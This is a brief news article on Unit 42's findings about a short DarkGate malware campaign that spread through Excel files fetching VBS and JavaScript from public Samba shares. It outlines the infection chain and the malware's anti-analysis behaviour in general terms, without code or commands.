Experts in cybersecurity have revealed a brief DarkGate malware offensive that exploited Samba file shares to kickstart the infections.
Unit 42 from Palo Alto Networks mentioned that this operation took place during March and April 2024, utilizing servers that ran publicly accessible Samba file shares hosting Visual Basic Script (VBS) and JavaScript files. The targeted regions included North America, Europe, and portions of Asia.
“This represents a rather short-lived initiative which serves as a demonstration of how malicious entities can ingeniously misuse legitimate applications and platforms to distribute their malware,” commented security analysts Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh, and Brad Duncan stated.
Initially emerging in 2018, DarkGate has progressed into a malware-as-a-service (MaaS) model utilized by a closely monitored clientele. It includes functions for remotely managing compromised systems, executing code, mining cryptocurrency, launching reverse shells, and deploying additional payloads.
Incidents involving this malware have notably surged in recent times following the global crackdown on the QakBot infrastructure by law enforcement agencies in August 2023.
The investigation conducted by Unit 42 begins with Microsoft Excel (.xlsx) files that, upon opening, prompt victims to click on an embedded Open button, triggering the retrieval and execution of VBS code hosted on a Samba share.
The PowerShell script is set up to fetch and run a PowerShell script, which in turn is used to download a DarkGate package that is based on AutoHotKey.
Alternative routines utilizing JavaScript files instead of VBS operate similarly, aiming to download and execute the subsequent PowerShell script.
DarkGate operates by scanning for diverse anti-malware utilities and inspecting the CPU details to differentiate between physical hosts and virtual environments, hence impeding analysis efforts. It also scrutinizes the active processes on the host to identify the presence of debugging tools, reverse engineering tools, or virtualization software.
“The C2 traffic of DarkGate employs unencrypted HTTP requests, although the data is encrypted and appears as Base64-encoded text,” noted the researchers.
“As DarkGate continues to develop and enhance its infiltration techniques and methods to counter analysis, it serves as a strong reminder of the necessity of robust and anticipatory cybersecurity defenses.”
About Author
